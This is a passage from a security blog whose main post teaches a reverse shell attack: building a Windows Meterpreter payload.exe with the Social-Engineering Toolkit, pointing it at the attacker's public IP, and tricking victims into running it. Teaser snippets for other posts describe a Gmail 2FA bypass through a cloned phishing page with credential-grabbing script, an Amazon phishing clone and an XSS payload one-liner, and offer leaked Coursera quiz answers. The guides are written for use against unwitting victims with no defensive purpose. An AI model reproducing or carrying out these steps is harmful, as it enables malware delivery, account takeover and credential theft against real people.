The article explores the technique of remote server control through reverse shells employed by hackers, emphasizing their ability to gain unauthorized access and control over servers.
Get link
Facebook
X
Pinterest
Email
Other Apps
-
The article explores the technique of remote server control through reverse shells employed by hackers, emphasizing their ability to gain unauthorized access and control over servers.
In a conventional client-server setup, users interact with machines that offer services, and the roles of client and server are clearly defined. The client takes the initiative by establishing a connection to the server, which in turn listens for incoming connections on designated ports. This traditional model maintains a regulated communication flow, where the client makes requests and the server responds accordingly.
Nevertheless, within the domain of cybersecurity, threat actors consistently seek out new methods to exploit vulnerabilities and circumvent security safeguards. A prime example of such ingenuity is the reverse shell attack, which cleverly subverts the conventional client-server paradigm. Through skillful manipulation of this fundamental communication flow, attackers can infiltrate networks, extract valuable information, and inflict significant harm upon unsuspecting targets.
What is a Reverse Shell Attack?
A reverse shell attack is an illicit cyber attack in which an unauthorized individual obtains entry into a target server or computer system and establishes a remote connection from the compromised system to the attacker's machine. In contrast to conventional attacks where the attacker directly connects to the victim's system, a reverse shell attack involves reversing the communication flow to establish a covert connection back to the attacker.
The below snapshot shows an attacker using SSH to connect to the Target machine. Since firewalls are configured to block incoming SSH connections, this connection is rejected at the firewall.
The below snapshot shows the target computer using SSH to initiate a connection to the hacker’s machine. Since firewalls are configured to allow outgoing SSH connections, this connection is passed through the firewall. An attacker runs a server on their computer that waits for incoming SSH connections.
In Figure 3, the target (1) begins a SSH shell connection(2) by clicking a maliscious link or executable. The firewall (3) allows the connection because outdoing SSH is allowed by default. The attacker (4) on a public IP address waits for an incoming SSH connections. The attacker starts the exploit by a reverse shell (5) allowing a direct connection to the target computer.
Launch the Social-Engineering Toolkit Which is available inbuilt in kali linux
Step 2:
Type the command in linux terminal
#sudo setoolkit
Step 3:
select the option 1) social-Engineering Attacks
Step 4:
Select option 4 ) Create a payload and listener
Step 5:
Select option 2)Windows Reverse_TCP Meterpreter
Step 6:
Enter the IP address (LHOST)
What is lhost?
LHOST of the payload should be your public IP. Reason is that LHOST is embedded within the first stage payload. It must be able to connect back to the handler which means if the victim is outside the LAN, the payload stager needs a routable IP address to reach the handler. I will call the LHOST in payload as LHOST-PAYLOAD
Step 7:
Enter the LPORT
Step 8:
follow as below
Step 9:
once the payload is created successfully ,it opens msfconsole
Step 10:
Meterpreter creates the .exe file in /root/.set/payload.exe. Change to superuser and copy payload.exe file to your home directory.
BY using the command
$sudo -i
$ cp /root/.set/payload.exe /home/kali
Step 11:
Setting up the exploit is the easy part. Getting educated users to click on link or execute a file is the challenge. You can install the payload.exe on the victim’s computer via email, FTP, file transfer, web link, or USB drive. All you need is for them to execute the file by double-clicking on the payload.exe executable.
Our Windows 7 machine displays the payload.exe file on the desktop. Double-clicking or executing the .exe launches the connection to the server. Bypassing the firewall and any virus or malware protection you have on your network.
Step 12:
When the target clicks on the file, the exploit is complete. This exploit launches a remote connection to the attackers machine. In hacker terms, the system is Pwned
After the victim executes the payload.exe file the connection between hacker and Windows 7 is complete. The last line in this screenshot shows the connection
Type the sessions command to see what processes are running.
To escalate our session to run as a Windows user, type the sessions -i 1 command. If there are multiple sessions running, replace 1 with whatever process you want to capture.
Enter the sysinfo command to confirm OS and version numbers.
PlayItSafe google cyber security professional course 2 (COURSERA) 1)More about the CISSP security domains-practice quiz 2)Navigate threats, risks, and vulnerabilities- quiz 3)weeklychallenge-1 4)Test your knowledge: More about frameworks and controls-quiz 5)Test your knowledge: The CIA triad-quiz Test your knowledge: NIST frameworks Test your knowledge: OWASP principles and security audits Weekly challenge 2 Practice Quiz: Test your knowledge: Security information and event management (SIEM) dashboards Test your knowledge: Identify threats and vulnerabilities with SIEM tools Weekly challenge 3 Test your knowledge: Incident response Test your knowledge: Use a playbook to respond to an incident Weekly challenge 4 Hey guys this blog contains all answers of coursera 's google cyber security professional certification quiz answers.
FOUNDATIONS OF CYBERSECURITY GOOGLE(COURSERA) QUIZ ANSWERS Hi guys, i've completed a courses on foundations of cyber security in coursera. here am gonna drop my answer which i've noted while studying this course. ill drop the link of the notion LINK: notion answer for foundation of cybersecurity in coursera the above is the sequence order of the answer
HOW TO BYPASS THE 2FA(TWO FACTOR AUTHENTICATION) of gmail Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim REQUIREMENTS 1)KALI LINUX 2)SUBLIME TEXT EDITOR 3)NGROK STEP 1: Initially use your browser and search for google sign in STEP 2: Type the mail id you wanna hack, after entering the mail id and click next STEP 3: After entering the mail id and right click the mouse and click inspect STEP 4: after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes. STEP 5: paste it on sublime text editor and add some script at the end of the html tag ill drop the code here <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script> <script> $('button').click(function(e){ e.preventDefault() auth=$('...
Disclaimer for securityblog If you require any more information or have any questions about our site's disclaimer, please feel free to contact us by email at canonminibeast@gmail.com. Our Disclaimer was generated with the help of the Free Disclaimer Generator. Disclaimers for read it gain it All the information on this website - https://readitgainit.blogspot.com/ - is published in good faith and for general information purpose only. read it gain it does not make any warranties about the completeness, reliability and accuracy of this information. Any action you take upon the information you find on this website (read it gain it ), is strictly at your own risk. read it gain it will not be liable for any losses and/or damages in connection with the use of our website. From our website, you can visit other websites by following hyperlinks to such external sites. While we strive to provide only quality links to useful and ethical websites, we have no control over the conte...
AUTOMATED SCRIPT FOR FINDING XSS An example of a web security vulnerability is cross-site scripting (XSS), which enables attackers to insert malicious executable scripts into the code of a website or application that is trusted. An XSS attack is frequently started by an attacker tempting a user to click on a malicious link that they deliver to them. Through cross-site scripting (XSS) assaults, attackers can get around access restrictions like the same-origin policy, which separates websites from one another.Zero When the victim accesses the website or application that runs the malicious code, the attack really takes place.1. Malicious scripts are injected into websites that are otherwise trustworthy and benign in an exploit known as cross-site scripting (XSS). HERE IS THE SCRIPT THAT AUTOMATES XSS DETECTION cat urls.txt| egrep -iv ".(jpg|jpeg|js|cs|gif|tiff|png|woff|woff2|ico|pdf|svg|txt)" |qsreplace ' "><()'|tee c...
BEGINNER BUG BOUNTY TOOLS PART-1 Subdomain Enumeration: Subdomain enumeration, also known as subdomain discovery or subdomain reconnaissance, is the process of finding subdomains associated with a domain. Subdomains are part of a larger domain and can represent specific services, departments, or functions within an organization. Enumerating subdomains can be important for various purposes, including security assessments, web application testing, and domain management. Tools with Description Sublist3r - Fast subdomains enumeration tool for penetration testers Amass - In-depth Attack Surface Mapping and Asset Discovery massdns - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration) Findomain - The fastest and cross-platform subdomain enumerator, do not waste your time. Sudomy - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug huntin...
How Hackers do a phishing page in 8 lines of code phishing,what is phishing? Phishing is a cybercrime where scammers deceive individuals or organizations by creating fake emails, websites, or messages that appear legitimate to trick victims into providing sensitive information, such as login credentials, financial data, or personal details. These fraudulent attempts aim to steal valuable information or gain unauthorized access to accounts and can lead to identity theft, financial loss, or other malicious activities. To protect against phishing, it's crucial to be cautious of suspicious emails, links, and requests for personal information, and to verify the authenticity of websites and messages before sharing sensitive data. Always use strong passwords and enable multi-factor authentication whenever possible to enhance security. PRACTICAL STEPS: Here , I am gonna clone the amazon website with only 8 lines HERE IS THE CODE <html> <hea...
BIT-FLIPING Digital data, such as text, images, or videos, is stored and processed in computers as binary code, a sequence of 0s and 1s. Each 0 or 1 is called a bit, the smallest unit of data. A bit-flip occurs when a bit's state unintentionally changes from its initial value to the opposite. This can happen due to hardware errors, electromagnetic interference, or other factors. Bit-flips can lead to data corruption, software crashes, or system failures. To mitigate such issues, error-correcting codes and redundancy techniques are employed to detect and correct errors. Ensuring data integrity and reliability is crucial in digital systems to prevent data loss and maintain accurate information. In the realm of computing, bitsquatting and bit flipping are two intriguing phenomena that revolve around the fundamental building blocks of digital data - bits, which represent zeros and ones. Bitsquatting involves a scenario where a bit within a domain nam...
Privacy Policy for securityblog At read it gain it , accessible from https://readitgainit.blogspot.com/, one of our main priorities is the privacy of our visitors. This Privacy Policy document contains types of information that is collected and recorded by read it gain it and how we use it. If you have additional questions or require more information about our Privacy Policy, do not hesitate to contact us. This Privacy Policy applies only to our online activities and is valid for visitors to our website with regards to the information that they shared and/or collect in read it gain it . This policy is not applicable to any information collected offline or via channels other than this website. Consent By using our website, you hereby consent to our Privacy Policy and agree to its terms. Information we collect The personal information that you are asked to provide, and the reasons why you are asked to provide it, will be made clear to you at the point we ask you to prov...
Things should do after sublister(sublist3r) Sublist3r is tool which is used by pentester which shows unique subdomains as I showed below you won't get https:// in the begging of these url ,here I have a solution for it i.e ive developed a one line script for this Step 1: copy all the subdomains, After that use the command nano and store all the links and name it You see,there no https:// infront of the subdomains Step 2: USE THE BELOW COMMAND sudo python -c "with open('input.txt', 'r') as infile, open('output.txt', 'w') as outfile: outfile.write('\n'.join(['https://' + line.strip() for line in infile]))" boom!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Comments
Post a Comment